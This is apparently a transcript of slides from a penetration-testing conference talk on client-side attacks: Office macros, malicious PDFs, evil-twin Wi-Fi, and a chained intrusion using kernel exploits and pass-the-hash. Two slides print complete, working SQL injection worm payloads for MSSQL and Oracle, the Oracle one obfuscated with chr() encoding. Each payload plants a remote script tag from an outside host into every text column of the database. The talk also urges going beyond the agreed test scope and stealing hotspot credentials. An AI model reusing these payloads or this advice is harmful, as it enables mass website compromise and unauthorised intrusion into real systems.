The document discusses various client-side attack techniques, including exploiting Microsoft Office macros and malicious PDF files to execute code on targets' machines. It also covers USB-based attacks, SQL injection worms, and wireless evil twin attacks. The speaker advocates using "black hat" tactics like these during penetration tests to think outside the box and effectively compromise systems. An example operation called "CloudBurst" is described that starts with client-side attacks and pivots to a local kernel exploit and internal pass-the-hash attacks to fully compromise the target network.
1. Tactical Assassins : Client-Side OWNage
Prathan Phongthiproek
ACIS Professional Center
Senior Information Security Consultant
2. Who am I ?!
Instructor / Speaker
Red Team : Penetration Tester (Team Leader)
Security Consultant / Researcher
CWH Underground
Exploits and Vulnerabilities Disclosure
Milw0rm, Exploit-db, Security Focus, Secunia, Zeroday, etc
3. Let’s Talk!
Attack Layer 8: Client-Side OWNage
MS Office (Evil Macro)
Malicious Adobe PDF
Malicious USB
One-Click Attack
Evil-Twin Attack!
Built-in Pen-Test Tactics
Black Hat versus White Hat
Using Black Hat styles to Compromise system
Operation CloudBurst
25. One-Click Attack!
SQL Injection Worms - MSSQL!
';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST
(D E C L A R E @ T v a r c h a r ( 2 5 5 ) , @ C v a r c h a r ( 2
5 5 ) D E C LAR E T a b l e _ C u r s o r C U R S O R F O R
select a.name,b.name from sysobjects a,
syscolumns b where a.id=b.id and a.xtyp
e='u' and (b.xtype=99 or b.xtype=35 or
b.xtype=231 or b.xtype=167) OPEN Table
_Cursor FETCH NEXT FROM Table_Curs
o r I NTO @T, @ C W H I LE ( @ @ F ETC H _ STATU
S=0) BEGIN exec('update ['+@T+'] set ['
+@C+']=rtrim(convert(varchar,['+@C+']))
+''<script src=http://www.fengnima.cn/k.j
s></script>''')FETCH NEXT FROM Table_
Cursor INTO @T,@C END CLOSE Table_C
u r s o r D E A L L O C A T E T a b l e _ C u r s o r undefined AS
%20NVARCHAR(4000));EXEC(@S);--
26. One-Click Attack!
SQL Injection Worms - Oracle!
http://127.0.0.1:81/ora4.php?name=1 and 1=(select
SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES
('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE
PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
begin execute immediate '''''''' alter session set current_schema=SCOTT '''''''';
execute immediate ''''''''commit'''''''';for rec in (select chr(117)||chr(112)||chr(100)||
chr(97)||chr(116)|| chr(101)||chr(32)||T.TABLE_NAME||chr(32)||chr(115)||chr(101)||
chr(116)||chr(32)||C.column_name||chr(61)||C.column_name|| chr(124)||chr(124)||
chr(39)||chr(60)||chr(115)||chr(99)||chr(114)||chr(105)||chr(112)||chr(116)||chr(32)||
chr(115)||chr(114)||chr(99)|| chr(61)||chr(34)||chr(104)||chr(116)||chr(116)||chr(112)||
chr(58)||chr(47)||chr(47)||chr(119)||chr(119)||chr(119)||chr(46)||chr(110)|| chr(111)||
chr(116)||chr(115)||chr(111)||chr(115)||chr(101)||chr(99)||chr(117)||chr(114)||chr
(101)||chr(46)||chr(99)||chr(111)|| chr(109)||chr(47)||chr(116)||chr(101)||chr(115)||
chr(116)||chr(46)||chr(106)||chr(115)||chr(34)||chr(62)||chr(60)||chr(47)||chr(115)||
chr(99)||chr(114)||chr(105)||chr(112)||chr(116)||chr(62)||chr(39) as foo FROM
ALL_TABLES T,ALL_TAB_COLUMNS C WHERE T.TABLE_NAME =
C.TABLE_NAME and T.TABLESPACE_NAME like chr(85)||chr(83)||chr(69)||chr
(82)||chr(83) and C.data_type like chr(37)||chr(86)||chr(65)||chr(82)||chr(67)||chr
(72)||chr(65)||chr(82)||chr(37) and c.data_length>200) loop EXECUTE
IMMEDIATE rec.foo;end loop;execute immediate
''''''''commit'''''''';end;'''';END;'';END;--','SYS',0,'1',0) from dual)--
33. Evil-Twin Attack!
Karma + Metasploit = Karmetasploit !!
Rouge Access Point (Evil Twin): Steal usernames,
passwords and information from public wireless
hotspots
Why we don’t steal something evil like credit card
(Pay to Play) ??
38. Black Hat versus White Hat!
Thinking Outside of the Box Thinking Inside the box
Know one piece of information Assigned Limited block of IP
and have to expand from there address
Compromise all system and Unable to go beyond the scope
Target Attack of approved list, Only touch xyz
hosts, Don’t touch abc host.
All Methodologies was Integrate Follow Pen-Test Methodologies;
OSSTMM, NIST, ISSAF
Download Exploit from Milw0rm,
Manual Foot printing, No noisy Exploit with Core Impact,
scan, Just Nmap and 0-Day CANVAS, Metasploit
Attack
Oops, I cannot hack user.
Attack Layer 8 :Client-Side
OWNage
39. Using Black Hat styles to Compromise
system
Pen-Tester Must “Thinking outside of the box”
Attack Layer 8 : More effective result
Pen-Test with Black Hat styles
Using Black Hat Mind
Email Address Enumeration
Social Networking (Maltego)
Social Engineering (Adobe PDF, Evil Macro, One-Click
Attack, IE Aurora, etc)
Information Gathering All subdomain
xyz.victim.com, abc.victim.com, 123.victim.com
Blind Test, Compromise all system and Target Attack
42. KiTra0d – Local Ring0 Kernel Exploit
MS Windows NT #GP Trap Handler Allows Users to Switch Kernel
Stack
Affect every release of the Windows NT kernel (Window 2000, XP,
Server 2003, Vista, Server 2008, 7)
Non-Affect : Windows 7 (64-bit), Windows Server 2008 (64-bit,
Itanium)
Patch release MS10-015 on Feb 09 2010 Get The Hell
Outta Here !!
0-day for 1 month. W00t ! W00t !
44. Token Kidnapping – Elevate Privilege
Token - Web Cookies
On Windows XP / 2003 – Windows Service run as SYSTEM account
Compromise of a Service == Full System Compromise
On Windows Vista / 2008 - LocalService / NetworkService == System
Affect every release of the Windows NT kernel (Window 2000, XP,
Server 2003, Vista, Server 2008, 7)
Patch release MS09-012 on April 14 2009
0-day for 1 year. W00t ! W00t !!
Black hat Mind !!
Combine Attack Layer 8 + KiTrap0d + Token Kidnapping
45. Operation CloudBurst
Start Mission with Attack Layer 8
SPAM Mail / 1-Click Ownage
Reverse Shell to Attacker
KiTrap0D – The Message From Slave to God
0-Day Ring0 xpl, All Windows OS
Maintain Access
Pivot (Tunneling), Backdoor Position
Compromise All System and Domain Controller
Impersonate Token, Pass-The-Hash Attack